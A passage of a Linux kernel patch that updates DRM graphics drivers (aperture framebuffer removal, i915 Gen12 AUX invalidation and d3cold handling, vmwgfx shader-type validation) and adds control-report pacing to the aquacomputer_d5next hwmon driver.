+-	primary = pdev->resource[PCI_ROM_RESOURCE].flags & IORESOURCE_ROM_SHADOW;
+-#endif
+-
+-	return drm_aperture_remove_conflicting_framebuffers(base, size, primary, &ast_driver);
+-}
+-
+ static int ast_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ {
+ 	struct ast_private *ast;
+ 	struct drm_device *dev;
+ 	int ret;
+ 
+-	ret = ast_remove_conflicting_framebuffers(pdev);
++	ret = drm_aperture_remove_conflicting_pci_framebuffers(pdev, &ast_driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/drm_aperture.c b/drivers/gpu/drm/drm_aperture.c
+index 3b8fdeeafd53a..697cffbfd6037 100644
+--- a/drivers/gpu/drm/drm_aperture.c
++++ b/drivers/gpu/drm/drm_aperture.c
+@@ -32,17 +32,13 @@
+  *
+  *	static int remove_conflicting_framebuffers(struct pci_dev *pdev)
+  *	{
+- *		bool primary = false;
+  *		resource_size_t base, size;
+  *		int ret;
+  *
+  *		base = pci_resource_start(pdev, 0);
+  *		size = pci_resource_len(pdev, 0);
+- *	#ifdef CONFIG_X86
+- *		primary = pdev->resource[PCI_ROM_RESOURCE].flags & IORESOURCE_ROM_SHADOW;
+- *	#endif
+  *
+- *		return drm_aperture_remove_conflicting_framebuffers(base, size, primary,
++ *		return drm_aperture_remove_conflicting_framebuffers(base, size,
+  *		                                                    &example_driver);
+  *	}
+  *
+@@ -161,7 +157,6 @@ EXPORT_SYMBOL(devm_aperture_acquire_from_firmware);
+  * drm_aperture_remove_conflicting_framebuffers - remove existing framebuffers in the given range
+  * @base: the aperture's base address in physical memory
+  * @size: aperture size in bytes
+- * @primary: also kick vga16fb if present
+  * @req_driver: requesting DRM driver
+  *
+  * This function removes graphics device drivers which use the memory range described by
+@@ -171,9 +166,9 @@ EXPORT_SYMBOL(devm_aperture_acquire_from_firmware);
+  * 0 on success, or a negative errno code otherwise
+  */
+ int drm_aperture_remove_conflicting_framebuffers(resource_size_t base, resource_size_t size,
+-						 bool primary, const struct drm_driver *req_driver)
++						 const struct drm_driver *req_driver)
+ {
+-	return aperture_remove_conflicting_devices(base, size, primary, req_driver->name);
++	return aperture_remove_conflicting_devices(base, size, false, req_driver->name);
+ }
+ EXPORT_SYMBOL(drm_aperture_remove_conflicting_framebuffers);
+ 
+diff --git a/drivers/gpu/drm/gma500/psb_drv.c b/drivers/gpu/drm/gma500/psb_drv.c
+index cd9c73f5a64ab..738eb558a97e9 100644
+--- a/drivers/gpu/drm/gma500/psb_drv.c
++++ b/drivers/gpu/drm/gma500/psb_drv.c
+@@ -424,12 +424,17 @@ static int psb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	/*
+ 	 * We cannot yet easily find the framebuffer's location in memory. So
+-	 * remove all framebuffers here.
++	 * remove all framebuffers here. Note that we still want the pci special
++	 * handling to kick out vgacon.
+ 	 *
+ 	 * TODO: Refactor psb_driver_load() to map vdc_reg earlier. Then we
+ 	 *       might be able to read the framebuffer range from the device.
+ 	 */
+-	ret = drm_aperture_remove_framebuffers(true, &driver);
++	ret = drm_aperture_remove_framebuffers(&driver);
++	if (ret)
++		return ret;
++
++	ret = drm_aperture_remove_conflicting_pci_framebuffers(pdev, &driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+index ca127ff797f75..29ee0814bccc8 100644
+--- a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
++++ b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+@@ -74,7 +74,6 @@ static int hyperv_setup_vram(struct hyperv_drm_device *hv,
+ 
+ 	drm_aperture_remove_conflicting_framebuffers(screen_info.lfb_base,
+ 						     screen_info.lfb_size,
+-						     false,
+ 						     &hyperv_driver);
+ 
+ 	hv->fb_size = (unsigned long)hv->mmio_megabytes * 1024 * 1024;
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+index b2838732ac936..cc84685368715 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+@@ -165,14 +165,60 @@ static u32 preparser_disable(bool state)
+ 	return MI_ARB_CHECK | 1 << 8 | state;
+ }
+ 
+-u32 *gen12_emit_aux_table_inv(struct intel_gt *gt, u32 *cs, const i915_reg_t inv_reg)
++static i915_reg_t gen12_get_aux_inv_reg(struct intel_engine_cs *engine)
+ {
+-	u32 gsi_offset = gt->uncore->gsi_offset;
++	switch (engine->id) {
++	case RCS0:
++		return GEN12_CCS_AUX_INV;
++	case BCS0:
++		return GEN12_BCS0_AUX_INV;
++	case VCS0:
++		return GEN12_VD0_AUX_INV;
++	case VCS2:
++		return GEN12_VD2_AUX_INV;
++	case VECS0:
++		return GEN12_VE0_AUX_INV;
++	case CCS0:
++		return GEN12_CCS0_AUX_INV;
++	default:
++		return INVALID_MMIO_REG;
++	}
++}
++
++static bool gen12_needs_ccs_aux_inv(struct intel_engine_cs *engine)
++{
++	i915_reg_t reg = gen12_get_aux_inv_reg(engine);
++
++	if (IS_PONTEVECCHIO(engine->i915))
++		return false;
++
++	/*
++	 * So far platforms supported by i915 having flat ccs do not require
++	 * AUX invalidation. Check also whether the engine requires it.
++	 */
++	return i915_mmio_reg_valid(reg) && !HAS_FLAT_CCS(engine->i915);
++}
++
++u32 *gen12_emit_aux_table_inv(struct intel_engine_cs *engine, u32 *cs)
++{
++	i915_reg_t inv_reg = gen12_get_aux_inv_reg(engine);
++	u32 gsi_offset = engine->gt->uncore->gsi_offset;
++
++	if (!gen12_needs_ccs_aux_inv(engine))
++		return cs;
+ 
+ 	*cs++ = MI_LOAD_REGISTER_IMM(1) | MI_LRI_MMIO_REMAP_EN;
+ 	*cs++ = i915_mmio_reg_offset(inv_reg) + gsi_offset;
+ 	*cs++ = AUX_INV;
+-	*cs++ = MI_NOOP;
++
++	*cs++ = MI_SEMAPHORE_WAIT_TOKEN |
++		MI_SEMAPHORE_REGISTER_POLL |
++		MI_SEMAPHORE_POLL |
++		MI_SEMAPHORE_SAD_EQ_SDD;
++	*cs++ = 0;
++	*cs++ = i915_mmio_reg_offset(inv_reg) + gsi_offset;
++	*cs++ = 0;
++	*cs++ = 0;
+ 
+ 	return cs;
+ }
+@@ -181,7 +227,11 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ {
+ 	struct intel_engine_cs *engine = rq->engine;
+ 
+-	if (mode & EMIT_FLUSH) {
++	/*
++	 * On Aux CCS platforms the invalidation of the Aux
++	 * table requires quiescing memory traffic beforehand
++	 */
++	if (mode & EMIT_FLUSH || gen12_needs_ccs_aux_inv(engine)) {
+ 		u32 flags = 0;
+ 		u32 *cs;
+ 
+@@ -236,10 +286,9 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 		else if (engine->class == COMPUTE_CLASS)
+ 			flags &= ~PIPE_CONTROL_3D_ENGINE_FLAGS;
+ 
+-		if (!HAS_FLAT_CCS(rq->engine->i915))
+-			count = 8 + 4;
+-		else
+-			count = 8;
++		count = 8;
++		if (gen12_needs_ccs_aux_inv(rq->engine))
++			count += 8;
+ 
+ 		cs = intel_ring_begin(rq, count);
+ 		if (IS_ERR(cs))
+@@ -254,11 +303,7 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 
+ 		cs = gen8_emit_pipe_control(cs, flags, LRC_PPHWSP_SCRATCH_ADDR);
+ 
+-		if (!HAS_FLAT_CCS(rq->engine->i915)) {
+-			/* hsdes: 1809175790 */
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt, cs,
+-						      GEN12_CCS_AUX_INV);
+-		}
++		cs = gen12_emit_aux_table_inv(engine, cs);
+ 
+ 		*cs++ = preparser_disable(false);
+ 		intel_ring_advance(rq, cs);
+@@ -269,21 +314,14 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 
+ int gen12_emit_flush_xcs(struct i915_request *rq, u32 mode)
+ {
+-	intel_engine_mask_t aux_inv = 0;
+-	u32 cmd, *cs;
++	u32 cmd = 4;
++	u32 *cs;
+ 
+-	cmd = 4;
+ 	if (mode & EMIT_INVALIDATE) {
+ 		cmd += 2;
+ 
+-		if (!HAS_FLAT_CCS(rq->engine->i915) &&
+-		    (rq->engine->class == VIDEO_DECODE_CLASS ||
+-		     rq->engine->class == VIDEO_ENHANCEMENT_CLASS)) {
+-			aux_inv = rq->engine->mask &
+-				~GENMASK(_BCS(I915_MAX_BCS - 1), BCS0);
+-			if (aux_inv)
+-				cmd += 4;
+-		}
++		if (gen12_needs_ccs_aux_inv(rq->engine))
++			cmd += 8;
+ 	}
+ 
+ 	cs = intel_ring_begin(rq, cmd);
+@@ -314,14 +352,7 @@ int gen12_emit_flush_xcs(struct i915_request *rq, u32 mode)
+ 	*cs++ = 0; /* upper addr */
+ 	*cs++ = 0; /* value */
+ 
+-	if (aux_inv) { /* hsdes: 1809175790 */
+-		if (rq->engine->class == VIDEO_DECODE_CLASS)
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VD0_AUX_INV);
+-		else
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VE0_AUX_INV);
+-	}
++	cs = gen12_emit_aux_table_inv(rq->engine, cs);
+ 
+ 	if (mode & EMIT_INVALIDATE)
+ 		*cs++ = preparser_disable(false);
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.h b/drivers/gpu/drm/i915/gt/gen8_engine_cs.h
+index e4d24c811dd61..651eb786e930c 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.h
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.h
+@@ -13,6 +13,7 @@
+ #include "intel_gt_regs.h"
+ #include "intel_gpu_commands.h"
+ 
++struct intel_engine_cs;
+ struct intel_gt;
+ struct i915_request;
+ 
+@@ -46,7 +47,7 @@ u32 *gen8_emit_fini_breadcrumb_rcs(struct i915_request *rq, u32 *cs);
+ u32 *gen11_emit_fini_breadcrumb_rcs(struct i915_request *rq, u32 *cs);
+ u32 *gen12_emit_fini_breadcrumb_rcs(struct i915_request *rq, u32 *cs);
+ 
+-u32 *gen12_emit_aux_table_inv(struct intel_gt *gt, u32 *cs, const i915_reg_t inv_reg);
++u32 *gen12_emit_aux_table_inv(struct intel_engine_cs *engine, u32 *cs);
+ 
+ static inline u32 *
+ __gen8_emit_pipe_control(u32 *batch, u32 flags0, u32 flags1, u32 offset)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gpu_commands.h b/drivers/gpu/drm/i915/gt/intel_gpu_commands.h
+index d4e9702d3c8e7..25ea5f8a464a4 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gpu_commands.h
++++ b/drivers/gpu/drm/i915/gt/intel_gpu_commands.h
+@@ -120,6 +120,7 @@
+ #define   MI_SEMAPHORE_TARGET(engine)	((engine)<<15)
+ #define MI_SEMAPHORE_WAIT	MI_INSTR(0x1c, 2) /* GEN8+ */
+ #define MI_SEMAPHORE_WAIT_TOKEN	MI_INSTR(0x1c, 3) /* GEN12+ */
++#define   MI_SEMAPHORE_REGISTER_POLL	(1 << 16)
+ #define   MI_SEMAPHORE_POLL		(1 << 15)
+ #define   MI_SEMAPHORE_SAD_GT_SDD	(0 << 12)
+ #define   MI_SEMAPHORE_SAD_GTE_SDD	(1 << 12)
+diff --git a/drivers/gpu/drm/i915/gt/intel_lrc.c b/drivers/gpu/drm/i915/gt/intel_lrc.c
+index 137e41e37ea54..7eb01ff17d89b 100644
+--- a/drivers/gpu/drm/i915/gt/intel_lrc.c
++++ b/drivers/gpu/drm/i915/gt/intel_lrc.c
+@@ -1296,10 +1296,7 @@ gen12_emit_indirect_ctx_rcs(const struct intel_context *ce, u32 *cs)
+ 	    IS_DG2_G11(ce->engine->i915))
+ 		cs = gen8_emit_pipe_control(cs, PIPE_CONTROL_INSTRUCTION_CACHE_INVALIDATE, 0);
+ 
+-	/* hsdes: 1809175790 */
+-	if (!HAS_FLAT_CCS(ce->engine->i915))
+-		cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-					      cs, GEN12_CCS_AUX_INV);
++	cs = gen12_emit_aux_table_inv(ce->engine, cs);
+ 
+ 	/* Wa_16014892111 */
+ 	if (IS_DG2(ce->engine->i915))
+@@ -1322,17 +1319,7 @@ gen12_emit_indirect_ctx_xcs(const struct intel_context *ce, u32 *cs)
+ 						    PIPE_CONTROL_INSTRUCTION_CACHE_INVALIDATE,
+ 						    0);
+ 
+-	/* hsdes: 1809175790 */
+-	if (!HAS_FLAT_CCS(ce->engine->i915)) {
+-		if (ce->engine->class == VIDEO_DECODE_CLASS)
+-			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VD0_AUX_INV);
+-		else if (ce->engine->class == VIDEO_ENHANCEMENT_CLASS)
+-			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VE0_AUX_INV);
+-	}
+-
+-	return cs;
++	return gen12_emit_aux_table_inv(ce->engine, cs);
+ }
+ 
+ static void
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index 35bc2a3fa811c..75a93951fe429 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -574,7 +574,6 @@ static int i915_pcode_init(struct drm_i915_private *i915)
+ static int i915_driver_hw_probe(struct drm_i915_private *dev_priv)
+ {
+ 	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
+-	struct pci_dev *root_pdev;
+ 	int ret;
+ 
+ 	if (i915_inject_probe_failure(dev_priv))
+@@ -686,15 +685,6 @@ static int i915_driver_hw_probe(struct drm_i915_private *dev_priv)
+ 
+ 	intel_bw_init_hw(dev_priv);
+ 
+-	/*
+-	 * FIXME: Temporary hammer to avoid freezing the machine on our DGFX
+-	 * This should be totally removed when we handle the pci states properly
+-	 * on runtime PM and on s2idle cases.
+-	 */
+-	root_pdev = pcie_find_root_port(pdev);
+-	if (root_pdev)
+-		pci_d3cold_disable(root_pdev);
+-
+ 	return 0;
+ 
+ err_msi:
+@@ -718,16 +708,11 @@ err_perf:
+ static void i915_driver_hw_remove(struct drm_i915_private *dev_priv)
+ {
+ 	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
+-	struct pci_dev *root_pdev;
+ 
+ 	i915_perf_fini(dev_priv);
+ 
+ 	if (pdev->msi_enabled)
+ 		pci_disable_msi(pdev);
+-
+-	root_pdev = pcie_find_root_port(pdev);
+-	if (root_pdev)
+-		pci_d3cold_enable(root_pdev);
+ }
+ 
+ /**
+@@ -1625,6 +1610,8 @@ static int intel_runtime_suspend(struct device *kdev)
+ {
+ 	struct drm_i915_private *dev_priv = kdev_to_i915(kdev);
+ 	struct intel_runtime_pm *rpm = &dev_priv->runtime_pm;
++	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
++	struct pci_dev *root_pdev;
+ 	struct intel_gt *gt;
+ 	int ret, i;
+ 
+@@ -1674,6 +1661,15 @@ static int intel_runtime_suspend(struct device *kdev)
+ 		drm_err(&dev_priv->drm,
+ 			"Unclaimed access detected prior to suspending\n");
+ 
++	/*
++	 * FIXME: Temporary hammer to avoid freezing the machine on our DGFX
++	 * This should be totally removed when we handle the pci states properly
++	 * on runtime PM.
++	 */
++	root_pdev = pcie_find_root_port(pdev);
++	if (root_pdev)
++		pci_d3cold_disable(root_pdev);
++
+ 	rpm->suspended = true;
+ 
+ 	/*
+@@ -1712,6 +1708,8 @@ static int intel_runtime_resume(struct device *kdev)
+ {
+ 	struct drm_i915_private *dev_priv = kdev_to_i915(kdev);
+ 	struct intel_runtime_pm *rpm = &dev_priv->runtime_pm;
++	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
++	struct pci_dev *root_pdev;
+ 	struct intel_gt *gt;
+ 	int ret, i;
+ 
+@@ -1725,6 +1723,11 @@ static int intel_runtime_resume(struct device *kdev)
+ 
+ 	intel_opregion_notify_adapter(dev_priv, PCI_D0);
+ 	rpm->suspended = false;
++
++	root_pdev = pcie_find_root_port(pdev);
++	if (root_pdev)
++		pci_d3cold_enable(root_pdev);
++
+ 	if (intel_uncore_unclaimed_mmio(&dev_priv->uncore))
+ 		drm_dbg(&dev_priv->drm,
+ 			"Unclaimed access during suspend, bios?\n");
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index eea433ade79d0..119544d88b586 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -285,7 +285,7 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	 * Remove early framebuffers (ie. simplefb). The framebuffer can be
+ 	 * located anywhere in RAM
+ 	 */
+-	ret = drm_aperture_remove_framebuffers(false, &meson_driver);
++	ret = drm_aperture_remove_framebuffers(&meson_driver);
+ 	if (ret)
+ 		goto free_drm;
+ 
+diff --git a/drivers/gpu/drm/msm/msm_fbdev.c b/drivers/gpu/drm/msm/msm_fbdev.c
+index 46168eccfac4a..d4a9b501e1bcc 100644
+--- a/drivers/gpu/drm/msm/msm_fbdev.c
++++ b/drivers/gpu/drm/msm/msm_fbdev.c
+@@ -157,7 +157,7 @@ struct drm_fb_helper *msm_fbdev_init(struct drm_device *dev)
+ 	}
+ 
+ 	/* the fw fb could be anywhere in memory */
+-	ret = drm_aperture_remove_framebuffers(false, dev->driver);
++	ret = drm_aperture_remove_framebuffers(dev->driver);
+ 	if (ret)
+ 		goto fini;
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_drv.c b/drivers/gpu/drm/rockchip/rockchip_drm_drv.c
+index 813f9f8c86982..8e12053a220b0 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_drv.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_drv.c
+@@ -140,7 +140,7 @@ static int rockchip_drm_bind(struct device *dev)
+ 	int ret;
+ 
+ 	/* Remove existing drivers that may own the framebuffer memory. */
+-	ret = drm_aperture_remove_framebuffers(false, &rockchip_drm_driver);
++	ret = drm_aperture_remove_framebuffers(&rockchip_drm_driver);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev,
+ 			      "Failed to remove existing framebuffers - %d.\n",
+diff --git a/drivers/gpu/drm/stm/drv.c b/drivers/gpu/drm/stm/drv.c
+index d7914f5122dff..0a09a85ac9d69 100644
+--- a/drivers/gpu/drm/stm/drv.c
++++ b/drivers/gpu/drm/stm/drv.c
+@@ -185,7 +185,7 @@ static int stm_drm_platform_probe(struct platform_device *pdev)
+ 
+ 	DRM_DEBUG("%s\n", __func__);
+ 
+-	ret = drm_aperture_remove_framebuffers(false, &drv_driver);
++	ret = drm_aperture_remove_framebuffers(&drv_driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/sun4i/sun4i_drv.c b/drivers/gpu/drm/sun4i/sun4i_drv.c
+index 7910c5853f0a8..5c483bbccbbbc 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_drv.c
++++ b/drivers/gpu/drm/sun4i/sun4i_drv.c
+@@ -98,7 +98,7 @@ static int sun4i_drv_bind(struct device *dev)
+ 		goto unbind_all;
+ 
+ 	/* Remove early framebuffers (ie. simplefb) */
+-	ret = drm_aperture_remove_framebuffers(false, &sun4i_drv_driver);
++	ret = drm_aperture_remove_framebuffers(&sun4i_drv_driver);
+ 	if (ret)
+ 		goto unbind_all;
+ 
+diff --git a/drivers/gpu/drm/tegra/drm.c b/drivers/gpu/drm/tegra/drm.c
+index a1f909dac89a7..5fc55b9777cbf 100644
+--- a/drivers/gpu/drm/tegra/drm.c
++++ b/drivers/gpu/drm/tegra/drm.c
+@@ -1252,7 +1252,7 @@ static int host1x_drm_probe(struct host1x_device *dev)
+ 
+ 	drm_mode_config_reset(drm);
+ 
+-	err = drm_aperture_remove_framebuffers(false, &tegra_drm_driver);
++	err = drm_aperture_remove_framebuffers(&tegra_drm_driver);
+ 	if (err < 0)
+ 		goto hub;
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_drv.c b/drivers/gpu/drm/vc4/vc4_drv.c
+index 8c329c071c62d..b6384a5dfdbc1 100644
+--- a/drivers/gpu/drm/vc4/vc4_drv.c
++++ b/drivers/gpu/drm/vc4/vc4_drv.c
+@@ -351,7 +351,7 @@ static int vc4_drm_bind(struct device *dev)
+ 			return -EPROBE_DEFER;
+ 	}
+ 
+-	ret = drm_aperture_remove_framebuffers(false, driver);
++	ret = drm_aperture_remove_framebuffers(driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 1ec9c53a7bf43..8459fab9d9797 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -1683,4 +1683,16 @@ static inline bool vmw_has_fences(struct vmw_private *vmw)
+ 	return (vmw_fifo_caps(vmw) & SVGA_FIFO_CAP_FENCE) != 0;
+ }
+ 
++static inline bool vmw_shadertype_is_valid(enum vmw_sm_type shader_model,
++					   u32 shader_type)
++{
++	SVGA3dShaderType max_allowed = SVGA3D_SHADERTYPE_PREDX_MAX;
++
++	if (shader_model >= VMW_SM_5)
++		max_allowed = SVGA3D_SHADERTYPE_MAX;
++	else if (shader_model >= VMW_SM_4)
++		max_allowed = SVGA3D_SHADERTYPE_DX10_MAX;
++	return shader_type >= SVGA3D_SHADERTYPE_MIN && shader_type < max_allowed;
++}
++
+ #endif
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 1c88b74d68cf0..58ca9adf09871 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1985,7 +1985,7 @@ static int vmw_cmd_set_shader(struct vmw_private *dev_priv,
+ 
+ 	cmd = container_of(header, typeof(*cmd), header);
+ 
+-	if (cmd->body.type >= SVGA3D_SHADERTYPE_PREDX_MAX) {
++	if (!vmw_shadertype_is_valid(VMW_SM_LEGACY, cmd->body.type)) {
+ 		VMW_DEBUG_USER("Illegal shader type %u.\n",
+ 			       (unsigned int) cmd->body.type);
+ 		return -EINVAL;
+@@ -2108,8 +2108,6 @@ vmw_cmd_dx_set_single_constant_buffer(struct vmw_private *dev_priv,
+ 				      SVGA3dCmdHeader *header)
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdDXSetSingleConstantBuffer);
+-	SVGA3dShaderType max_shader_num = has_sm5_context(dev_priv) ?
+-		SVGA3D_NUM_SHADERTYPE : SVGA3D_NUM_SHADERTYPE_DX10;
+ 
+ 	struct vmw_resource *res = NULL;
+ 	struct vmw_ctx_validation_info *ctx_node = VMW_GET_CTX_NODE(sw_context);
+@@ -2126,6 +2124,14 @@ vmw_cmd_dx_set_single_constant_buffer(struct vmw_private *dev_priv,
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
++	if (!vmw_shadertype_is_valid(dev_priv->sm_type, cmd->body.type) ||
++	    cmd->body.slot >= SVGA3D_DX_MAX_CONSTBUFFERS) {
++		VMW_DEBUG_USER("Illegal const buffer shader %u slot %u.\n",
++			       (unsigned int) cmd->body.type,
++			       (unsigned int) cmd->body.slot);
++		return -EINVAL;
++	}
++
+ 	binding.bi.ctx = ctx_node->ctx;
+ 	binding.bi.res = res;
+ 	binding.bi.bt = vmw_ctx_binding_cb;
+@@ -2134,14 +2140,6 @@ vmw_cmd_dx_set_single_constant_buffer(struct vmw_private *dev_priv,
+ 	binding.size = cmd->body.sizeInBytes;
+ 	binding.slot = cmd->body.slot;
+ 
+-	if (binding.shader_slot >= max_shader_num ||
+-	    binding.slot >= SVGA3D_DX_MAX_CONSTBUFFERS) {
+-		VMW_DEBUG_USER("Illegal const buffer shader %u slot %u.\n",
+-			       (unsigned int) cmd->body.type,
+-			       (unsigned int) binding.slot);
+-		return -EINVAL;
+-	}
+-
+ 	vmw_binding_add(ctx_node->staged, &binding.bi, binding.shader_slot,
+ 			binding.slot);
+ 
+@@ -2200,15 +2198,13 @@ static int vmw_cmd_dx_set_shader_res(struct vmw_private *dev_priv,
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdDXSetShaderResources) =
+ 		container_of(header, typeof(*cmd), header);
+-	SVGA3dShaderType max_allowed = has_sm5_context(dev_priv) ?
+-		SVGA3D_SHADERTYPE_MAX : SVGA3D_SHADERTYPE_DX10_MAX;
+ 
+ 	u32 num_sr_view = (cmd->header.size - sizeof(cmd->body)) /
+ 		sizeof(SVGA3dShaderResourceViewId);
+ 
+ 	if ((u64) cmd->body.startView + (u64) num_sr_view >
+ 	    (u64) SVGA3D_DX_MAX_SRVIEWS ||
+-	    cmd->body.type >= max_allowed) {
++	    !vmw_shadertype_is_valid(dev_priv->sm_type, cmd->body.type)) {
+ 		VMW_DEBUG_USER("Invalid shader binding.\n");
+ 		return -EINVAL;
+ 	}
+@@ -2232,8 +2228,6 @@ static int vmw_cmd_dx_set_shader(struct vmw_private *dev_priv,
+ 				 SVGA3dCmdHeader *header)
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdDXSetShader);
+-	SVGA3dShaderType max_allowed = has_sm5_context(dev_priv) ?
+-		SVGA3D_SHADERTYPE_MAX : SVGA3D_SHADERTYPE_DX10_MAX;
+ 	struct vmw_resource *res = NULL;
+ 	struct vmw_ctx_validation_info *ctx_node = VMW_GET_CTX_NODE(sw_context);
+ 	struct vmw_ctx_bindinfo_shader binding;
+@@ -2244,8 +2238,7 @@ static int vmw_cmd_dx_set_shader(struct vmw_private *dev_priv,
+ 
+ 	cmd = container_of(header, typeof(*cmd), header);
+ 
+-	if (cmd->body.type >= max_allowed ||
+-	    cmd->body.type < SVGA3D_SHADERTYPE_MIN) {
++	if (!vmw_shadertype_is_valid(dev_priv->sm_type, cmd->body.type)) {
+ 		VMW_DEBUG_USER("Illegal shader type %u.\n",
+ 			       (unsigned int) cmd->body.type);
+ 		return -EINVAL;
+diff --git a/drivers/hwmon/aquacomputer_d5next.c b/drivers/hwmon/aquacomputer_d5next.c
+index c51a2678f0eb5..8c7796d3fdd2d 100644
+--- a/drivers/hwmon/aquacomputer_d5next.c
++++ b/drivers/hwmon/aquacomputer_d5next.c
+@@ -12,9 +12,11 @@
+ 
+ #include <linux/crc16.h>
+ #include <linux/debugfs.h>
++#include <linux/delay.h>
+ #include <linux/hid.h>
+ #include <linux/hwmon.h>
+ #include <linux/jiffies.h>
++#include <linux/ktime.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/seq_file.h>
+@@ -49,6 +51,8 @@ static const char *const aqc_device_names[] = {
+ 
+ #define CTRL_REPORT_ID			0x03
+ 
++#define CTRL_REPORT_DELAY		200	/* ms */
++
+ /* The HID report that the official software always sends
+  * after writing values, currently same for all devices
+  */
+@@ -269,6 +273,9 @@ struct aqc_data {
+ 	enum kinds kind;
+ 	const char *name;
+ 
++	ktime_t last_ctrl_report_op;
++	int ctrl_report_delay;	/* Delay between two ctrl report operations, in ms */
++
+ 	int buffer_size;
+ 	u8 *buffer;
+ 	int checksum_start;
+@@ -325,17 +332,35 @@ static int aqc_pwm_to_percent(long val)
+ 	return DIV_ROUND_CLOSEST(val * 100 * 100, 255);
+ }
+ 
++static void aqc_delay_ctrl_report(struct aqc_data *priv)
++{
++	/*
++	 * If previous read or write is too close to this one, delay the current operation
++	 * to give the device enough time to process the previous one.
++	 */
++	if (priv->ctrl_report_delay) {
++		s64 delta = ktime_ms_delta(ktime_get(), priv->last_ctrl_report_op);
++
++		if (delta < priv->ctrl_report_delay)
++			msleep(priv->ctrl_report_delay - delta);
++	}
++}
++
+ /* Expects the mutex to be locked */
+ static int aqc_get_ctrl_data(struct aqc_data *priv)
+ {
+ 	int ret;
+ 
++	aqc_delay_ctrl_report(priv);
++
+ 	memset(priv->buffer, 0x00, priv->buffer_size);
+ 	ret = hid_hw_raw_request(priv->hdev, CTRL_REPORT_ID, priv->buffer, priv->buffer_size,
+ 				 HID_FEATURE_REPORT, HID_REQ_GET_REPORT);
+ 	if (ret < 0)
+ 		ret = -ENODATA;
+ 
++	priv->last_ctrl_report_op = ktime_get();
++
+ 	return ret;
+ }
+ 
+@@ -345,6 +370,8 @@ static int aqc_send_ctrl_data(struct aqc_data *priv)
+ 	int ret;
+ 	u16 checksum;
+ 
++	aqc_delay_ctrl_report(priv);
++
+ 	/* Init and xorout value for CRC-16/USB is 0xffff */
+ 	checksum = crc16(0xffff, priv->buffer + priv->checksum_start, priv->checksum_length);
+ 	checksum ^= 0xffff;
+@@ -356,12 +383,16 @@ static int aqc_send_ctrl_data(struct aqc_data *priv)
+ 	ret = hid_hw_raw_request(priv->hdev, CTRL_REPORT_ID, priv->buffer, priv->buffer_size,
+ 				 HID_FEATURE_REPORT, HID_REQ_SET_REPORT);
+ 	if (ret < 0)
+-		return ret;
++		goto record_access_and_ret;
+ 
+ 	/* The official software sends this report after every change, so do it here as well */
+ 	ret = hid_hw_raw_request(priv->hdev, SECONDARY_CTRL_REPORT_ID, secondary_ctrl_report,
+ 				 SECONDARY_CTRL_REPORT_SIZE, HID_FEATURE_REPORT,
